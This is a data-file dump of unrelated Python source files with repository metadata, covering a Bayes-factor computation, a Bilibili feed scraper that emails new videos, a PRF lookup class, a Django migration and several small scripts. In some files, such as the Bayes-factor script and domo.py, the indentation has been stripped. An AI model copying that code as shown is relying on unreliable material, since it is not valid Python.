] | 1 | 2017-02-27T23:11:54.000Z | 2017-07-31T17:55:25.000Z | python/compute_bayes_factors.py | CardiacModelling/PyHillFit | 91a9b5dd3a9455dbf0f3a2ea4785402925fab26b | [
"BSD-3-Clause"
] | 2 | 2020-04-06T11:45:05.000Z | 2020-12-17T16:50:04.000Z | import doseresponse as dr
import numpy as np
from glob import glob
import itertools as it
import os
import argparse
import sys
import multiprocessing as mp
def compute_log_py_approxn(temp):
print temp
drug,channel,chain_file,images_dir = dr.nonhierarchical_chain_file_and_figs_dir(m, top_drug, top_channel, temp)
chain = np.loadtxt(chain_file, usecols=range(dr.num_params))
num_its = chain.shape[0]
total = 0.
start = 0
for it in xrange(start,num_its):
temperature = 1 # approximating full likelihood
temp_bit = dr.log_data_likelihood(responses, where_r_0, where_r_100, where_r_other, concs, chain[it, :], temperature, pi_bit)
total += temp_bit
if temp_bit == -np.inf:
print chain[it, :]
answer = total / (num_its-start)
if answer == -np.inf:
print "ANSWER IS -INF"
return answer
parser = argparse.ArgumentParser()
parser.add_argument("-nc", "--num-cores", type=int, help="number of cores to parallelise drug/channel combinations", default=1)
requiredNamed = parser.add_argument_group('required arguments')
requiredNamed.add_argument("-d", "--drug", type=int, help="drug index", required=True)
requiredNamed.add_argument("-c", "--channel", type=int, help="channel index", required=True)
requiredNamed.add_argument("--data-file", type=str, help="csv file from which to read in data, in same format as provided crumb_data.csv", required=True)
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
num_models = 2
model_pairs = it.combinations(range(1, num_models+1), r=2)
expectations = {}
dr.setup(args.data_file)
top_drug = dr.drugs[args.drug]
top_channel = dr.channels[args.channel]
num_expts, experiment_numbers, experiments = dr.load_crumb_data(top_drug, top_channel)
concs = np.array([])
responses = np.array([])
for i in xrange(num_expts):
concs = np.concatenate((concs, experiments[i][:, 0]))
responses = np.concatenate((responses, experiments[i][:, 1]))
where_r_0 = responses==0
where_r_100 = responses==100
where_r_other = (responses>0) & (responses<100)
pi_bit = dr.compute_pi_bit_of_log_likelihood(where_r_other)
num_pts = where_r_other.sum()
for m in xrange(1, num_models+1):
dr.define_model(m)
temps = (np.arange(dr.n+1.)/dr.n)**dr.c
num_temps = len(temps)
if args.num_cores == 1:
log_p_ys = np.zeros(num_temps)
for i in xrange(num_temps):
log_p_ys[i] = compute_log_py_approxn(temps[i])
elif args.num_cores > 1:
pool = mp.Pool(args.num_cores)
log_p_ys = np.array(pool.map_async(compute_log_py_approxn, temps).get(9999))
pool.close()
pool.join()
print log_p_ys
expectations[m] = dr.trapezium_rule(temps, log_p_ys)
print expectations
drug, channel, chain_file, images_dir = dr.nonhierarchical_chain_file_and_figs_dir(1, top_drug, top_channel, 1)
bf_dir = "BFs/"
if not os.path.exists(bf_dir):
os.makedirs(bf_dir)
bf_file = bf_dir + "{}_{}_B12.txt".format(drug,channel)
for pair in model_pairs:
i, j = pair
#print expectations[i], expectations[j]
Bij = np.exp(expectations[i]-expectations[j])
#print Bij
#with open("{}_{}_BF.txt".format(drug,channel), "w") as outfile:
# outfile.write("{} + {}\n".format(drug,channel))
# outfile.write("B_{}{} = {}\n".format(i, j, Bij))
# outfile.write("B_{}{} = {}\n".format(j, i, 1./Bij))
np.savetxt(bf_file, [Bij])
| 33.298077 | 153 | 0.688132 | 533 | 3,463 | 4.253283 | 0.290807 | 0.021173 | 0.013233 | 0.025143 | 0.145567 | 0.093516 | 0.057345 | 0.057345 | 0.057345 | 0.057345 | 0 | 0.014998 | 0.172105 | 3,463 | 103 | 154 | 33.621359 | 0.775724 | 0.085764 | 0 | 0 | 0 | 0 | 0.079239 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.103896 | null | null | 0.077922 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8f9e79d289f9458ec61d577f158e33314ed0402c | 4,520 | py | Python | nb/nbexp_bilibili.py | xsthunder/rss-reborn | d1bff6cefddd2e6f33af8c7c5e5939e880dc0034 | [
"MIT"
] | 2 | 2020-03-03T15:43:10.000Z | 2020-03-03T16:25:56.000Z | nb/nbexp_bilibili.py | xsthunder/rss-reborn | d1bff6cefddd2e6f33af8c7c5e5939e880dc0034 | [
"MIT"
] | null | null | null | nb/nbexp_bilibili.py | xsthunder/rss-reborn | d1bff6cefddd2e6f33af8c7c5e5939e880dc0034 | [
"MIT"
] | null | null | null |
#################################################
### THIS FILE WAS AUTOGENERATED! DO NOT EDIT! ###
#################################################
# file to edit: ./bilibili.ipynb
from nbexp_personal import sendEmail
def itemgetter(*args):
g = operator.itemgetter(*args)
def f(*args2):
return dict(zip(args, g(*args2)))
return f
def write_json(filename, content):
with open(filename, 'w', encoding='UTF-8') as f:
json.dump( content,f, ensure_ascii=False, indent=4)
def read_json(filename):
with open(filename, 'r', encoding='UTF-8') as f:
return json.load( f)
# 复制为cCURL(posix)
def read_code(code_path):
with open(code_path, 'r', encoding='UTF-8') as f:
code = f.read().split('\n')[0]
return code
code =read_code('../bili_curl.txt')
import nbexp_uncurl
import requests
from functools import partial
def fetch_code(code):
"""
default timeout for five second
"""
c =nbexp_uncurl.parse(code, timeout=5)
r = eval(c)
j = r.json()
return j
import operator
import json
import datetime
def get_time(timestamp):
d = datetime.datetime.fromtimestamp(timestamp)
d = d.isoformat()
return d
def cvt_cards(j):
cards = j['data']['cards']
# card = cards[0]
# uname = card['desc']['user_profile']['info']['uname']
# card = card['card']
# print( desc)
# return
unames = list(map(lambda card:card['desc']['user_profile']['info']['uname'], cards))
cards = list(map(operator.itemgetter('card'), cards))
cards = list(map(json.loads, cards))
kl = ('title', 'desc', 'pic', 'stat', 'ctime')
cards = list(map(itemgetter(*kl), cards))
def cvt(tp):
card, uname = tp
content_id = str(card['stat']['aid'])
content = itemgetter(*kl[:-2])(card)
pic = content['pic'] + '@64w_36h_1c.jpg'
content['pic'] = pic
d = get_time(card['ctime'])
url = 'https://www.bilibili.com/video/av' + content_id
return (content_id, {'content': content , "url":url , 'time':d, 'uname':uname } )
cards = dict((map(cvt, zip(cards, unames))))
return cards
def get_cards():
fetch = partial(fetch_code, code)
cards = cvt_cards(fetch())
return cards
def render_div(v):
content = v['content']
desc = content['desc']
if len(desc) > 50:
desc = desc[:20]+'...'
body = f"""
<div style="margin:10px">
<img src='{content['pic']}'>
<a href='{v['url']}'>{content['title']}</a>
<span>{desc} {v['time']}</span>
</div>
"""
return body
def render_html(v_list):
divs = ''.join(map(render_div, v_list))
html = f"""\
<html>
<head></head>
<body>
{divs}
</body>
</html>
"""
return html
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
# Create the body of the message (a plain-text and an HTML version).
def render_msg(v_list, sub_name=""):
v_list = list(v_list)
html = render_html(v_list)
msg = MIMEMultipart('alternative')
msg['Subject'] = sub_name + '订阅' + '+' + str(len(v_list))
msg['From'] = sub_name
msg['To'] = ''
# Record the MIME types of both parts - text/plain and text/html.
part2 = MIMEText(html, 'html')
msg.attach(part2)
return msg.as_string()
def get_main(json_path, get_cards, sub_name=""):
"""
json_path where to read old cards and save merge content
"""
def main():
cards = get_cards()
wj = partial( write_json, json_path,)
rj = partial( read_json, json_path,)
if not exists(json_path):
# 发送所有
wj({})
old_cards = rj()
new_cards = filter(lambda tp:tp[0] not in old_cards, cards.items())
new_cards = map(operator.itemgetter(1), new_cards)
new_cards = list(new_cards)
if new_cards:
msg = render_msg(new_cards, sub_name)
sendEmail(msg)
old_cards.update(cards)
wj(old_cards)
return main
def block_on_观视频工作室(tp):
key, o = tp
if o['uname'] != '观视频工作室': return True
if '睡前消息' in o['content']['title']: return True
return False
def filter_get_cards():
cards = get_cards()
cards = list(filter(block_on_观视频工作室, cards.items()))
cards = dict(cards)
return cards
from os.path import exists
json_path = './bili.json'
main = get_main(json_path, filter_get_cards, "bili")
if __name__ == '__main__': main() | 24.565217 | 90 | 0.58031 | 603 | 4,520 | 4.208955 | 0.301824 | 0.01379 | 0.014184 | 0.016548 | 0.040583 | 0.034673 | 0 | 0 | 0 | 0 | 0 | 0.007323 | 0.24469 | 4,520 | 184 | 91 | 24.565217 | 0.736087 | 0.098451 | 0 | 0.057851 | 1 | 0 | 0.143221 | 0.016026 | 0 | 0 | 0 | 0 | 0 | 1 | 0.140496 | false | 0 | 0.082645 | 0.008264 | 0.347107 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8fa773d3da48d404608fe06cb4c8e55711ac793c | 239 | py | Python | notebooks/tests/test_mandelbrot_incorrect_test.py | cvdavis3/python-training | 77b53b0f84f658a2fb883ac82673404fa0c1f255 | [
"Apache-2.0"
] | null | null | null | notebooks/tests/test_mandelbrot_incorrect_test.py | cvdavis3/python-training | 77b53b0f84f658a2fb883ac82673404fa0c1f255 | [
"Apache-2.0"
] | null | null | null | notebooks/tests/test_mandelbrot_incorrect_test.py | cvdavis3/python-training | 77b53b0f84f658a2fb883ac82673404fa0c1f255 | [
"Apache-2.0"
] | null | null | null | import numpy as np
from mandlebrot import mandelbrot
def test_mandelbrot_incorrect_test():
x = np.linspace(-1.5, -2.0, 10)
y = np.linspace(-1.25, 1.25, 10)
output = mandelbrot(x, y, 100, False)
assert np.all(output == 0.0) | 29.875 | 41 | 0.665272 | 41 | 239 | 3.804878 | 0.585366 | 0.128205 | 0.141026 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.098446 | 0.192469 | 239 | 8 | 42 | 29.875 | 0.709845 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.142857 | 1 | 0.142857 | false | 0 | 0.285714 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8faa5150622f7a7260386468cdf1dd80f3148292 | 245 | py | Python | python/destinations/Hello-Panda/quix_function.py | SteveQuixDemo/quix-library | d2ebc220aefb815170fadcb3c9873cc4b2f46fc9 | [
"Apache-2.0"
] | 7 | 2022-01-24T23:21:15.000Z | 2022-03-26T20:51:16.000Z | python/destinations/Hello-Panda/quix_function.py | SteveQuixDemo/quix-library | d2ebc220aefb815170fadcb3c9873cc4b2f46fc9 | [
"Apache-2.0"
] | 9 | 2022-01-17T12:27:34.000Z | 2022-03-31T13:11:57.000Z | python/destinations/Hello-Panda/quix_function.py | SteveQuixDemo/quix-library | d2ebc220aefb815170fadcb3c9873cc4b2f46fc9 | [
"Apache-2.0"
] | 3 | 2022-02-08T11:24:43.000Z | 2022-03-30T14:50:57.000Z | from quixstreaming import ParameterData
class QuixFunction:
# Callback triggered for each new parameter data.
def on_parameter_data_handler(self, data: ParameterData):
df = data.to_panda_frame()
print(df.to_string())
| 22.272727 | 61 | 0.726531 | 30 | 245 | 5.733333 | 0.766667 | 0.151163 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.204082 | 245 | 10 | 62 | 24.5 | 0.882051 | 0.191837 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.2 | 0 | 0.6 | 0.2 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
8fb3fcc41834373888df11ca3beac35e76e07acb | 610 | py | Python | src/domo.py | iFabio2/domo | 685a887b7440adcf2ec4780ac2386b7b2cad0209 | [
"Apache-2.0"
] | null | null | null | src/domo.py | iFabio2/domo | 685a887b7440adcf2ec4780ac2386b7b2cad0209 | [
"Apache-2.0"
] | null | null | null | src/domo.py | iFabio2/domo | 685a887b7440adcf2ec4780ac2386b7b2cad0209 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python
import sys, time
from domo import DomoApp, DomoLog
#main object creation
myapp = DomoApp.DomoApp()
#try:
if 1 == 1:
'''first thing we do is to create the main object
which in turn will create the rest of the objects'''
DomoLog.log('INFO', 'main', 'starting threads')
myapp.run()
i = 0
while i < 2:
print "i is " + str(i)
time.sleep(10)
i = i + 1
#except:
# print "FATAL: {0}".format(sys.exc_info()[0])
# DomoLog.log('ERROR', 'main', 'caught exception')
#finally:
myapp.cleanup()
DomoLog.log('INFO', 'main', 'clean exit')
| 21.034483 | 59 | 0.598361 | 89 | 610 | 4.089888 | 0.629213 | 0.082418 | 0.076923 | 0.098901 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.019608 | 0.247541 | 610 | 28 | 60 | 21.785714 | 0.77342 | 0.254098 | 0 | 0 | 0 | 0 | 0.138643 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.153846 | null | null | 0.076923 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8fb571fde8880cb6b3ed3ef3fdd2b031759c7a96 | 485 | py | Python | examples/Python/multiedges.py | var414n/ubigraph_server | 66571a68b7c2b27debc65df390426d77cbb88795 | [
"Apache-2.0"
] | 4 | 2022-01-18T00:41:39.000Z | 2022-02-04T09:45:29.000Z | examples/Python/multiedges.py | var414n/ubigraph_server | 66571a68b7c2b27debc65df390426d77cbb88795 | [
"Apache-2.0"
] | null | null | null | examples/Python/multiedges.py | var414n/ubigraph_server | 66571a68b7c2b27debc65df390426d77cbb88795 | [
"Apache-2.0"
] | 1 | 2019-01-06T12:56:32.000Z | 2019-01-06T12:56:32.000Z | import xmlrpclib
import time
# Create an object to represent our server.
server_url = 'http://127.0.0.1:20738/RPC2'
server = xmlrpclib.Server(server_url)
G = server.ubigraph
G.clear()
x = G.new_vertex()
y = G.new_vertex()
G.set_edge_style_attribute(0, "spline", "true")
G.set_vertex_style_attribute(0, "shape", "sphere")
G.set_vertex_style_attribute(0, "size", "0.3")
G.set_vertex_style_attribute(0, "color", "#FFDB25")
for i in range(0,20):
G.new_edge(x,y)
time.sleep(0.4)
| 20.208333 | 51 | 0.717526 | 86 | 485 | 3.848837 | 0.5 | 0.048338 | 0.181269 | 0.135952 | 0.226586 | 0.226586 | 0 | 0 | 0 | 0 | 0 | 0.058411 | 0.117526 | 485 | 23 | 52 | 21.086957 | 0.714953 | 0.084536 | 0 | 0 | 0 | 0 | 0.151927 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.133333 | 0 | 0.133333 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8fbadd797079a59bb7c16b5b056dc3c3435e7089 | 1,390 | py | Python | tools/reuse_factors_examples.py | walkieq/LSTM-HLS | f90bc769153e667eb8a30c7c4147bd53620f02bb | [
"Apache-2.0"
] | 18 | 2021-06-17T18:25:02.000Z | 2022-03-29T09:30:50.000Z | tools/reuse_factors_examples.py | vamsikrishnabodaballa/RNN_HLS | 892b5315c27953af7dc387f4df5475962178201a | [
"Apache-2.0"
] | 3 | 2021-10-30T17:48:04.000Z | 2022-01-08T21:03:40.000Z | tools/reuse_factors_examples.py | vamsikrishnabodaballa/RNN_HLS | 892b5315c27953af7dc387f4df5475962178201a | [
"Apache-2.0"
] | 5 | 2021-06-17T18:25:06.000Z | 2022-03-17T11:05:54.000Z | import math
import numpy as np
"""
This function calculates the roots of the quadratic inequality for the Rh reuse factor.
Parameters:
lx - list of input sizes of the lstms. The size of this list is equal to the number of layers.
lh - list of input sizes of the hidden layers. The size of this list is equal to the number of layers.
lt_sigma - the latency of the sigmoid/tanh functions.
lt_tail - the latency of the tail.
dsp_total - the total number of dsps
This returns the roots of the quadratic inequality.
"""
def reuse_factor(lx, lh, lt_sigma, lt_tail, dsp_total):
a = dsp_total - 4 * sum(lh)
b = dsp_total * (lt_sigma + lt_tail) - 4 * np.dot(lx, lh) - 4 * np.dot(lh, lh) - 4 * (lt_sigma + lt_tail) * sum(lh)
c = - 4 * (lt_sigma + lt_tail) * np.dot(lh, lh)
# print(a)
# print(b)
# print(c)
r_1 = (-b + math.sqrt(b**2 - 4*a*c)) / (2*a)
r_2 = (-b - math.sqrt(b**2 - 4*a*c)) / (2*a)
return r_1, r_2
print("ZYNQ")
print(reuse_factor([1,9],[9,9], 3,8,220))
print("lstm_ae_small exmaple")
print(reuse_factor([1,9],[9,9], 3,8,900))
print("\n")
print("KU115")
print("mnist 1/2 layers examples")
print(reuse_factor([28],[32], 3,8,5520))
print(reuse_factor([28,16],[16,16], 3,8,5520))
print("\n")
print("U250")
print("lstm_ae exmaple")
print(reuse_factor([1,32,8,8],[32,8,8,32], 3,8,12200))
| 28.367347 | 119 | 0.627338 | 256 | 1,390 | 3.300781 | 0.292969 | 0.091124 | 0.094675 | 0.061538 | 0.386982 | 0.31716 | 0.191716 | 0.191716 | 0.191716 | 0.139645 | 0 | 0.076007 | 0.214388 | 1,390 | 48 | 120 | 28.958333 | 0.697802 | 0.023022 | 0 | 0.090909 | 0 | 0 | 0.095941 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.045455 | false | 0 | 0.090909 | 0 | 0.181818 | 0.590909 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |
8fbe2b88fe74cf906d86d3d7c7460534f06760eb | 1,318 | py | Python | run_evaulate.py | aayn/seaadrl-pytorch | 964ba1130ab3218c3d54ae794aced80093ab4102 | [
"MIT"
] | 3 | 2021-08-31T01:09:39.000Z | 2022-01-05T06:00:33.000Z | run_evaulate.py | aayn/seaadrl-pytorch | 964ba1130ab3218c3d54ae794aced80093ab4102 | [
"MIT"
] | null | null | null | run_evaulate.py | aayn/seaadrl-pytorch | 964ba1130ab3218c3d54ae794aced80093ab4102 | [
"MIT"
] | 1 | 2022-01-05T06:00:36.000Z | 2022-01-05T06:00:36.000Z | import os
import time
from collections import deque
import functools
import itertools
from typing import Callable, Iterable
import numpy as np
import yaml
import gym
from box import Box
import torch
# torch.multiprocessing.set_start_method("forkserver")
import torch.nn as nn
from torch.utils.data import IterableDataset, DataLoader
from torch import optim
from a2c_ppo_acktr import algo, utils
from a2c_ppo_acktr.envs import make_vec_envs
from a2c_ppo_acktr.utils import get_vec_normalize
from a2c_ppo_acktr.model import Policy
from a2c_ppo_acktr.storage import RolloutStorage
from evaluation import evaluate
def main():
with open("seaadrl.yaml") as f:
config = Box(yaml.load(f, Loader=yaml.FullLoader)["baseline"])
device = utils.get_device()
# trained_agent, _ = torch.load(
# os.path.join(config.load_dir, config.env_name + ".pt"), map_location=device
# )
# trained_agent.eval()
trained_agent, _ = torch.load(
os.path.join(config.load_dir, config.env_name + "-vaxxed_2.pt"), map_location=device
)
trained_agent.eval()
evaluate(
trained_agent,
None,
config.env_name,
seed=1,
num_processes=24,
eval_log_dir='/tmp/gym',
device=utils.get_device(),
)
if __name__ == "__main__":
main() | 23.963636 | 92 | 0.714719 | 184 | 1,318 | 4.880435 | 0.423913 | 0.038976 | 0.055679 | 0.083519 | 0.2049 | 0.2049 | 0.2049 | 0.126949 | 0.126949 | 0.126949 | 0 | 0.008491 | 0.195751 | 1,318 | 55 | 93 | 23.963636 | 0.838679 | 0.141123 | 0 | 0 | 0 | 0 | 0.042591 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.025641 | false | 0 | 0.512821 | 0 | 0.538462 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
8fd112385e85f60302d92c1ec0b726f196a2d2f8 | 964 | py | Python | commercialoperator/migrations/0086_auto_20200817_1702.py | shibaken/commercialoperator | 1e0adfe683288626d9d3113e9efb44e0eba78adb | [
"Apache-2.0"
] | null | null | null | commercialoperator/migrations/0086_auto_20200817_1702.py | shibaken/commercialoperator | 1e0adfe683288626d9d3113e9efb44e0eba78adb | [
"Apache-2.0"
] | 12 | 2020-02-12T06:26:55.000Z | 2022-02-13T05:52:54.000Z | commercialoperator/migrations/0086_auto_20200817_1702.py | shibaken/commercialoperator | 1e0adfe683288626d9d3113e9efb44e0eba78adb | [
"Apache-2.0"
] | 8 | 2020-02-24T05:11:18.000Z | 2021-02-26T07:54:24.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.10.8 on 2020-08-17 09:02
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('commercialoperator', '0085_proposaleventotherdetails_other_comments'),
]
operations = [
migrations.AddField(
model_name='proposal',
name='filming_licence_charge_type',
field=models.CharField(choices=[('half_day_charge', 'Half day charge'), ('full_day_charge', 'Full day charge'), ('2_days_charge', '2 days charge'), ('3_or_more_days_charge', '3 or more days charge')], default='full_day_charge', max_length=30, verbose_name='Filming Licence charge Type'),
),
migrations.AddField(
model_name='proposal',
name='filming_non_standard_charge',
field=models.DecimalField(decimal_places=2, default='0.00', max_digits=8),
),
]
| 37.076923 | 299 | 0.664938 | 114 | 964 | 5.342105 | 0.552632 | 0.073892 | 0.064039 | 0.08867 | 0.35468 | 0.223317 | 0.223317 | 0 | 0 | 0 | 0 | 0.041995 | 0.209544 | 964 | 25 | 300 | 38.56 | 0.757218 | 0.070539 | 0 | 0.333333 | 1 | 0 | 0.343785 | 0.134379 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.111111 | 0 | 0.277778 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8fd627c34fe6856c059f4f50328f1da178a89cc8 | 3,527 | py | Python | diffimg/AbstractPrfLookup.py | exoplanetvetting/DAVE | aea19a30d987b214fb4c0cf01aa733f127c411b9 | [
"MIT"
] | 7 | 2019-05-07T02:01:51.000Z | 2022-03-16T08:09:39.000Z | diffimg/AbstractPrfLookup.py | barentsen/dave | 45ba97b7b535ad26dd555c33c963c6224a9af23c | [
"MIT"
] | 18 | 2015-12-09T22:18:59.000Z | 2017-04-26T13:11:44.000Z | diffimg/AbstractPrfLookup.py | barentsen/dave | 45ba97b7b535ad26dd555c33c963c6224a9af23c | [
"MIT"
] | 5 | 2017-03-08T11:42:53.000Z | 2020-05-07T00:10:37.000Z | """
Created on Sun Dec 2 14:12:41 2018
@author: fergal
"""
from __future__ import print_function
from __future__ import division
import numpy as np
class AbstractPrfLookup(object):
"""Store and lookup a previously computed PRF function
This abstract class is created in the hope that much of the functionality can
be reused for TESS.
To get the recorded prf, use
getPrfForBbbox(), although this function doesn't work in the base class. See docs
in that method for more details
Other functions are in the works to map that PRF onto
a given mask.
Todo
--------
This class is ripe of optimization with numba
"""
def __init__(self, path):
self.path = path
self.cache = dict()
self.gridSize = None
def abstractGetPrfForBbox(self, col, row, bboxIn, getPrfFunc, *args):
"""Get the prf for an image described by a bounding box
This function requires as input a function to look up the PRF for a given col row
(getPrfFunc). This function is not implemented in the base class, as it will be
specific to each mission. The design intent is that you override getPrfForBbox()
in the daughter class where
you define the lookup function, then calls the parent class method.
See KeplerPrf() for an example
Input:
-----------
col, row
(floats) Centroid for which to generate prf
bboxIn
(int array). Size of image to return. bbox
is a 4 elt array of [col0, col1, row0, row1]
getPrfFunc
(function) Function that returns a PRF object
This function must have the signature
``(np 2d array = getPrfFunc(col, row, *args)``
Optional Inputs
-----------------
Any optional inputs get passed to getPrfFunc
Returns:
----------
A 2d numpy array of the computed prf at the
given position.
Notes:
------------
If bbox is larger than the prf postage stamp returned,
the missing values will be filled with zeros. If
the bbox is smaller than the postage stamp, only the
requestd pixels will be returned
"""
bbox = np.array(bboxIn).astype(int)
nColOut = bbox[1] - bbox[0]
nRowOut = bbox[3] - bbox[2]
imgOut = np.zeros( (nRowOut, nColOut) )
#Location of origin of bbox relative to col,row.
#This is usually zero, but need not be.
colOffsetOut = (bbox[0] - np.floor(col)).astype(np.int)
rowOffsetOut = (bbox[2] - np.floor(row)).astype(np.int)
interpPrf = getPrfFunc(col, row, *args)
nRowPrf, nColPrf = interpPrf.shape
colOffsetPrf = -np.floor(nColPrf/2.).astype(np.int)
rowOffsetPrf = -np.floor(nRowPrf/2.).astype(np.int)
di = colOffsetPrf - colOffsetOut
i0 = max(0, -di)
i1 = min(nColOut-di , nColPrf)
if i1 <= i0:
raise ValueError("Central pixel column not in bounding box")
i = np.arange(i0, i1)
assert(np.min(i) >= 0)
dj = rowOffsetPrf - rowOffsetOut
j0 = max(0, -dj)
j1 = min(nRowOut-dj, nRowPrf)
if j1 <= j0:
raise ValueError("Central pixel row not in bounding box")
j = np.arange(j0, j1)
assert(np.min(j) >= 0)
#@TODO: figure out how to do this in one step
for r in j:
imgOut[r+dj, i+di] = interpPrf[r, i]
return imgOut
| 30.938596 | 89 | 0.600227 | 477 | 3,527 | 4.410901 | 0.429769 | 0.01711 | 0.020913 | 0.013308 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017241 | 0.309328 | 3,527 | 113 | 90 | 31.212389 | 0.84647 | 0.49277 | 0 | 0 | 0 | 0 | 0.052203 | 0 | 0 | 0 | 0 | 0.017699 | 0.055556 | 1 | 0.055556 | false | 0 | 0.083333 | 0 | 0.194444 | 0.027778 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8fd7c61de1a9fa96c0542025479683d5e477222b | 39,478 | py | Python | main.py | Template-Latex/Export-Subtemplate | 595bf76f5c94daffdba4fbb686d51cce7ad298c8 | [
"MIT"
] | 1 | 2017-08-02T02:54:53.000Z | 2017-08-02T02:54:53.000Z | main.py | Template-Latex/Export-Subtemplate | 595bf76f5c94daffdba4fbb686d51cce7ad298c8 | [
"MIT"
] | null | null | null | main.py | Template-Latex/Export-Subtemplate | 595bf76f5c94daffdba4fbb686d51cce7ad298c8 | [
"MIT"
] | null | null | null | """
EXPORT-SUBTEMPLATE
Genera distintos sub-releases y exporta los templates
Autor: Pablo Pizarro R. @ ppizarror.com
Licencia:
The MIT License (MIT)
Copyright 2017-2021 Pablo Pizarro R.
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the Software
is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
__all__ = ['CreateVersion']
# Importación de librerías
from extlbx import __author__, __version__
from extlbx.releases import REL_PROFESSIONALCV, REL_INFORME, REL_CONTROLES, REL_AUXILIAR, \
RELEASES, REL_REPORTE, REL_TESIS, REL_ARTICULO, REL_PRESENTACION, REL_POSTER
from extlbx.convert import *
from extlbx.version import *
from extlbx.sound import Sound
from extlbx.resources import *
from extlbx.utils import *
import tkinter as tk
from tkinter import font
from tkinter import messagebox
from extlbx.vframe import VerticalScrolledFrame
from pyperclip import copy as extlbcbpaste
from functools import partial
import json
import logging
import os
import signal
import traceback
PIL_EXIST = True
